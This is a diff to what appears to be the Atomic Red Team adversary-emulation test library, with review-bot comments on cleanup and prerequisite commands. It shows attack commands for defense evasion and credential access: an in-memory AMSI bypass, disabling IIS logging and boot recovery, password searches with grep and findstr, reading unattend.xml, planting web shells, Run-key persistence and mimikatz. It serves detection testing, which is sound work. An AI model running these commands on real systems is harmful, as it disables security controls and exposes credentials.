diff --git a/atomics/T1081/T1081.md b/atomics/T1081/T1081.md
index 899d16be..ff357622 100644
--- a/atomics/T1081/T1081.md
+++ b/atomics/T1081/T1081.md
@@ -14,11 +14,9 @@ In cloud environments, authenticated user credentials are often stored in local
- [Atomic Test #2 - Extract passwords with grep](#atomic-test-2---extract-passwords-with-grep)
-- [Atomic Test #3 - Runs Mimikatz & Mimikittenz by name](#atomic-test-3---runs-mimikatz--mimikittenz-by-name)
+- [Atomic Test #3 - Extracting passwords with findstr](#atomic-test-3---extracting-passwords-with-findstr)
-- [Atomic Test #4 - Extracting passwords with findstr](#atomic-test-4---extracting-passwords-with-findstr)
-
-- [Atomic Test #5 - Access "unattend.xml"](#atomic-test-5---access-unattendxml)
+- [Atomic Test #4 - Access unattend.xml](#atomic-test-4---access-unattendxml)
@@ -60,24 +58,7 @@ grep -ri password #{file_path}
-## Atomic Test #3 - Runs Mimikatz & Mimikittenz by name
-Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module.
-
-**Supported Platforms:** Windows
-
-
-#### Run it with `powershell`! Elevation Required (e.g. root or admin)
-```
-invoke-mimikittenz
-mimikatz.exe
-```
-
-
-
-
-
-
-## Atomic Test #4 - Extracting passwords with findstr
+## Atomic Test #3 - Extracting passwords with findstr
Extracting Credentials from Files
**Supported Platforms:** Windows
@@ -94,7 +75,7 @@ ls -R | select-string -Pattern password
-## Atomic Test #5 - Access "unattend.xml"
+## Atomic Test #4 - Access unattend.xml
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
**Supported Platforms:** Windows
@@ -102,8 +83,8 @@ Attempts to access unattend.xml, where credentials are commonly stored, within t
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
-cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1
-cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
+type C:\Windows\Panther\unattend.xml > nul 2>&1
+type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
```
diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index fd20609f..d9cb62a0 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -122,7 +122,6 @@ $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfilt
## Atomic Test #5 - Invoke-AppPathBypass
Note: Windows 10 only
-
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
**Supported Platforms:** Windows
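Review bot: Removing the blank line between `Note: Windows 10 only` and `Bypass is based on: ...` places both in one Markdown paragraph, so they render run together on a single line. Keep the blank line, or end the first line with a hard line break.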
diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 5f387adb..7e5d3176 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -173,7 +173,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
## Atomic Test #8 - Unload Sysmon Filter Driver
-Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
+Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
**Supported Platforms:** Windows
@@ -204,7 +204,7 @@ sc start sysmon
## Atomic Test #9 - Disable Windows IIS HTTP Logging
-Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
+Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
**Supported Platforms:** Windows
@@ -215,12 +215,20 @@ This action requires HTTP logging configurations in IIS to be unlocked.
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
-#### Run it with `command_prompt`!
+#### Run it with `powershell`!
```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
+#### Commands to Check Prerequisites:
+```
+if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}
+```
+#### Cleanup Commands:
+```
+C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
+```
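Review bot: The prerequisite line `if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}` only writes 0 or 1 to the output stream; it does not set an exit code. If the runner decides on exit status, use `exit 0` and `exit 1` in the two branches. Separately, the cleanup forces `/dontLog:false` regardless of the state before the test, so a site that already had HTTP logging disabled ends up configured differently than it started; record the prior setting and restore that instead.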
@@ -250,7 +258,7 @@ sysmon -i -accepteula
## Atomic Test #11 - AMSI Bypass - AMSI InitFailed
-Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
+Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
**Supported Platforms:** Windows
@@ -272,7 +280,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
-This test removes the Windows Defender provider registry key.
+This test removes the Windows Defender provider registry key.
**Supported Platforms:** Windows
@@ -292,7 +300,7 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
## Atomic Test #13 - Disable Arbitrary Security Windows Service
-With administrative rights, an adversary can disable Windows Services related to security products.
+With administrative rights, an adversary can disable Windows Services related to security products.
**Supported Platforms:** Windows
@@ -319,7 +327,7 @@ net.exe start #{service_name}
## Atomic Test #14 - Disable PowerShell Script Block Logging
-An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
+An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
Credit to Matt Graeber (@mattifestation) for the research.
@@ -347,7 +355,7 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging']
## Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface
-An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
+An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
Credit to Matt Graeber (@mattifestation) for the research.
diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md
index 1e1dac45..c0aabf18 100644
--- a/atomics/T1100/T1100.md
+++ b/atomics/T1100/T1100.md
@@ -31,5 +31,9 @@ xcopy #{web_shells} #{web_shell_path}
```
+#### Cleanup Commands:
+```
+del #{web_shell_path}
+```
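Review bot: The cleanup `del #{web_shell_path}` targets the same path used as the xcopy destination, so when that path is a directory it deletes every file in it, not only the files the test copied, and without `/q` it stops at a confirmation prompt. Delete only the copied files by name, quote the path, and add `/q` so the cleanup runs unattended.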
diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md
index ebb07c99..08cbbb25 100644
--- a/atomics/T1107/T1107.md
+++ b/atomics/T1107/T1107.md
@@ -104,14 +104,10 @@ Delete a single file from the temporary directory using cmd.exe
**Supported Platforms:** Windows
-#### Inputs
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-cmd\a|
-
#### Run it with `command_prompt`!
```
-del /f #{file_to_delete}
+echo "T1107" > %temp%\T1107.txt
+del /f %temp%\T1107.txt
```
@@ -125,14 +121,10 @@ Recursively delete the temporary directory and all files contained within it usi
**Supported Platforms:** Windows
-#### Inputs
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-cmd|
-
#### Run it with `command_prompt`!
```
-del /f /S #{folder_to_delete}
+mkdir %temp%\T1107
+rmdir /s /q %temp%\T1107
```
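Review bot: `mkdir %temp%\T1107` creates an empty directory, so `rmdir /s /q` never removes any contained files, although the test is described as recursively deleting the directory and all files within it. Write at least one file into the directory before removing it, and quote the `%temp%` paths in case the profile path contains spaces.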
@@ -146,14 +138,10 @@ Delete a single file from the temporary directory using Powershell
**Supported Platforms:** Windows
-#### Inputs
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-ps\a|
-
#### Run it with `powershell`!
```
-Remove-Item -path "#{file_to_delete}"
+New-Item $env:TEMP\T1107.txt
+Remove-Item -path $env:TEMP\T1107.txt
```
@@ -174,7 +162,8 @@ Recursively delete the temporary directory and all files contained within it usi
#### Run it with `powershell`!
```
-Remove-Item -path "#{folder_to_delete}" -recurse
+New-Item $env:TEMP\T1107 -ItemType Directory
+Remove-Item -path $env:TEMP\T1107 -recurse
```
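Review bot: Unlike the three sibling T1107 hunks, this one replaces `#{folder_to_delete}` in the command without removing an Inputs table, so if `folder_to_delete` is still declared above this hunk it is now unused and should be dropped. `New-Item $env:TEMP\T1107 -ItemType Directory` also errors when the directory is left over from an earlier aborted run; adding `-Force` keeps the test repeatable.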
@@ -220,7 +209,7 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
@@ -232,7 +221,7 @@ bcdedit /set {default} recoveryenabled no
## Atomic Test #11 - wbadmin
-This test deletes Windows Backup catalogs.
+This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 9acd2680..f7dc1c86 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -29,12 +29,16 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
+#### Cleanup Commands:
+```
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f
+```
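Review bot: The heading now states that elevation is required, but the command only writes to HKEY_CURRENT_USER, which the logged-in user can modify without admin rights; unless there is a reason not visible in this hunk, leave the test unelevated. The cleanup also deletes `HideFileExt` rather than restoring its previous data, so a host that had the value set before the test loses it.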
@@ -52,6 +56,10 @@ reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_
```
+#### Cleanup Commands:
+```
+reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
+```
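Review bot: The cleanup deletes the `SecurityHealth` value under `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run` outright. On a host where a value of that name already exists, the test overwrites it and the cleanup then removes it, so the original autorun entry is not restored. Save the existing data before the `reg add` and write it back in cleanup, or use a value name unique to the test.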
@@ -124,7 +132,7 @@ reg unload "HKU\$($ProfileList[$p].SID)"
## Atomic Test #4 - Modify registry to store logon credentials
-Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
+Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
**Supported Platforms:** Windows
diff --git a/atomics/index.md b/atomics/index.md
index 475276e9..c611b2af 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -661,9 +661,8 @@
- [T1081 Credentials in Files](./T1081/T1081.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- - Atomic Test #3: Runs Mimikatz & Mimikittenz by name [windows]
- - Atomic Test #4: Extracting passwords with findstr [windows]
- - Atomic Test #5: Access "unattend.xml" [windows]
+ - Atomic Test #3: Extracting passwords with findstr [windows]
+ - Atomic Test #4: Access unattend.xml [windows]
- [T1214 Credentials in Registry](./T1214/T1214.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index c10604d4..ae6ffce7 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -4992,6 +4992,9 @@ persistence:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
+'
+ cleanup_command: 'del #{web_shell_path}
+
'
T1084:
technique:
@@ -7102,8 +7105,10 @@ defense-evasion:
'
- name: Unload Sysmon Filter Driver
- description: "Unloads the Sysinternals Sysmon filter driver without stopping
- the Sysmon service. \n"
+ description: 'Unloads the Sysinternals Sysmon filter driver without stopping
+ the Sysmon service.
+
+'
supported_platforms:
- windows
input_arguments:
@@ -7126,9 +7131,9 @@ defense-evasion:
fltmc.exe load #{sysmon_driver}
sc start sysmon
- name: Disable Windows IIS HTTP Logging
- description: "Disables HTTP logging on a Windows IIS web server as seen by Threat
- Group 3390 (Bronze Union). \nThis action requires HTTP logging configurations
- in IIS to be unlocked.\n"
+ description: |
+ Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
+ This action requires HTTP logging configurations in IIS to be unlocked.
supported_platforms:
- windows
input_arguments:
@@ -7137,10 +7142,18 @@ defense-evasion:
type: string
default: Default Web Site
executor:
- name: command_prompt
+ name: powershell
+ prereq_command: 'if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0}
+ else {1}
+
+'
command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:true
+'
+ cleanup_command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
+ /section:httplogging /dontLog:false
+
'
- name: Uninstall Sysmon
description: 'Uninstall Sysinternals Sysmon for Defense Evasion
@@ -7161,8 +7174,9 @@ defense-evasion:
'
- name: AMSI Bypass - AMSI InitFailed
- description: "Any easy way to bypass AMSI inspection is it patch the dll in
- memory setting the \"amsiInitFailed\" function to true. \nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n"
+ description: |
+ Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
+ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
supported_platforms:
- windows
executor:
@@ -7171,9 +7185,9 @@ defense-evasion:
command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n"
- name: AMSI Bypass - Remove AMSI Provider Reg Key
- description: "With administrative rights, an adversary can remove the AMSI Provider
- registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis
- test removes the Windows Defender provider registry key. \n"
+ description: |
+ With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
+ This test removes the Windows Defender provider registry key.
supported_platforms:
- windows
executor:
@@ -7188,8 +7202,10 @@ defense-evasion:
'
- name: Disable Arbitrary Security Windows Service
- description: "With administrative rights, an adversary can disable Windows Services
- related to security products. \n"
+ description: 'With administrative rights, an adversary can disable Windows Services
+ related to security products.
+
+'
supported_platforms:
- windows
input_arguments:
@@ -7207,8 +7223,10 @@ defense-evasion:
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
- name: Disable PowerShell Script Block Logging
- description: "An adversary may disable PowerShell Script Block Logging to avoid
- leaving evidence. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+ description: |
+ An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
+
+ Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
- windows
executor:
@@ -7225,14 +7243,18 @@ defense-evasion:
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
- name: PowerShell Bypass of AntiMalware Scripting Interface
- description: "An adversary may bypass Windows Defender AMSI to execute malicious
- PowerShell code. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+ description: |
+ An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
+
+ Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
- command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)'
+ command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)
+
+'
T1107:
technique:
x_mitre_data_sources:
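Review bot: The "PowerShell Bypass of AntiMalware Scripting Interface" command sets `amsiInitFailed` to `$true` but, unlike the "AMSI Bypass - AMSI InitFailed" entry earlier in this file, has no `cleanup_command`. Since the command line is being rewritten here anyway, add the matching `SetValue($null,$false)` cleanup so the two tests behave the same way.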
@@ -7343,17 +7365,12 @@ defense-evasion:
'
supported_platforms:
- windows
- input_arguments:
- file_to_delete:
- description: Path of file to delete
- type: Path
- default: C:\Windows\Temp\victim-files-cmd\a
executor:
name: command_prompt
elevation_required: false
- command: 'del /f #{file_to_delete}
-
-'
+ command: |
+ echo "T1107" > %temp%\T1107.txt
+ del /f %temp%\T1107.txt
- name: Delete an entire folder - Windows cmd
description: 'Recursively delete the temporary directory and all files contained
within it using cmd.exe
@@ -7361,34 +7378,24 @@ defense-evasion:
'
supported_platforms:
- windows
- input_arguments:
- folder_to_delete:
- description: Path of folder to delete
- type: Path
- default: C:\Windows\Temp\victim-files-cmd
executor:
name: command_prompt
elevation_required: false
- command: 'del /f /S #{folder_to_delete}
-
-'
+ command: |
+ mkdir %temp%\T1107
+ rmdir /s /q %temp%\T1107
- name: Delete a single file - Windows PowerShell
description: 'Delete a single file from the temporary directory using Powershell
'
supported_platforms:
- windows
- input_arguments:
- file_to_delete:
- description: Path of file to delete
- type: Path
- default: C:\Windows\Temp\victim-files-ps\a
executor:
name: powershell
elevation_required: false
- command: 'Remove-Item -path "#{file_to_delete}"
-
-'
+ command: |
+ New-Item $env:TEMP\T1107.txt
+ Remove-Item -path $env:TEMP\T1107.txt
- name: Delete an entire folder - Windows PowerShell
description: 'Recursively delete the temporary directory and all files contained
within it using Powershell
@@ -7404,9 +7411,9 @@ defense-evasion:
executor:
name: powershell
elevation_required: false
- command: 'Remove-Item -path "#{folder_to_delete}" -recurse
-
-'
+ command: |
+ New-Item $env:TEMP\T1107 -ItemType Directory
+ Remove-Item -path $env:TEMP\T1107 -recurse
- name: Delete VSS - vssadmin
description: 'Delete all volume shadow copies with vssadmin.exe
@@ -7439,11 +7446,14 @@ defense-evasion:
- windows
executor:
name: command_prompt
+ elevation_required: true
command: |
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
- name: wbadmin
- description: "This test deletes Windows Backup catalogs. \n"
+ description: 'This test deletes Windows Backup catalogs.
+
+'
supported_platforms:
- windows
executor:
@@ -9488,10 +9498,14 @@ defense-evasion:
- windows
executor:
name: command_prompt
- elevation_required: false
+ elevation_required: true
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
+'
+ cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
+ /v HideFileExt /f
+
'
- name: Modify Registry of Local Machine - cmd
description: |
@@ -9505,6 +9519,10 @@ defense-evasion:
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
+'
+ cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
+ /v SecurityHealth /f
+
'
- name: Modify Registry of Another User Profile
description: 'Modify a registry key of each user profile not currently loaded
@@ -9570,9 +9588,10 @@ defense-evasion:
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"
- name: Modify registry to store logon credentials
- description: "Sets registry key that will tell windows to store plaintext passwords
+ description: 'Sets registry key that will tell windows to store plaintext passwords
(making the system vulnerable to clear text / cleartext password dumping)
- \n"
+
+'
supported_platforms:
- windows
executor:
@@ -9616,7 +9635,9 @@ defense-evasion:
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
cleanup_command: 'Remove-ItemProperty -Force -Path -Path #{registry_key_storage}
- -Name #{registry_entry_storage}'
+ -Name #{registry_entry_storage}
+
+'
T1170:
technique:
x_mitre_data_sources:
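Review bot: The unchanged first line of this `cleanup_command` still reads `Remove-ItemProperty -Force -Path -Path #{registry_key_storage}`; the repeated `-Path` is a parameter binding error in PowerShell, so the cleanup will not remove the stored value. This hunk only adjusts the trailing newline; drop the duplicate `-Path` in the same change.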
@@ -14943,6 +14964,9 @@ privilege-escalation:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
+'
+ cleanup_command: 'del #{web_shell_path}
+
'
impact:
T1531:
@@ -19261,19 +19285,6 @@ credential-access:
command: 'grep -ri password #{file_path}
'
- - name: Runs Mimikatz & Mimikittenz by name
- description: 'Mimikatz/kittenz - This will require a Mimikatz executable or
- invoke-mimikittenz ps module.
-
-'
- supported_platforms:
- - windows
- executor:
- name: powershell
- elevation_required: true
- command: |
- invoke-mimikittenz
- mimikatz.exe
- name: Extracting passwords with findstr
description: 'Extracting Credentials from Files
@@ -19286,7 +19297,7 @@ credential-access:
command: |
findstr /si pass *.xml | *.doc | *.txt | *.xls
ls -R | select-string -Pattern password
- - name: Access "unattend.xml"
+ - name: Access unattend.xml
description: 'Attempts to access unattend.xml, where credentials are commonly
stored, within the Panther directory where installation logs are stored.
@@ -19297,8 +19308,8 @@ credential-access:
name: command_prompt
elevation_required: true
command: |
- cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1
- cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
+ type C:\Windows\Panther\unattend.xml > nul 2>&1
+ type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
T1214:
technique:
x_mitre_permissions_required:
@@ -21416,7 +21427,6 @@ execution:
- name: Invoke-AppPathBypass
description: |
Note: Windows 10 only
-
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
supported_platforms:
- windows
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 2dc25b92..5cc9a9eb 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -473,9 +473,8 @@
- Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows]
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1081 Credentials in Files](./T1081/T1081.md)
- - Atomic Test #3: Runs Mimikatz & Mimikittenz by name [windows]
- - Atomic Test #4: Extracting passwords with findstr [windows]
- - Atomic Test #5: Access "unattend.xml" [windows]
+ - Atomic Test #3: Extracting passwords with findstr [windows]
+ - Atomic Test #4: Access unattend.xml [windows]
- [T1214 Credentials in Registry](./T1214/T1214.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)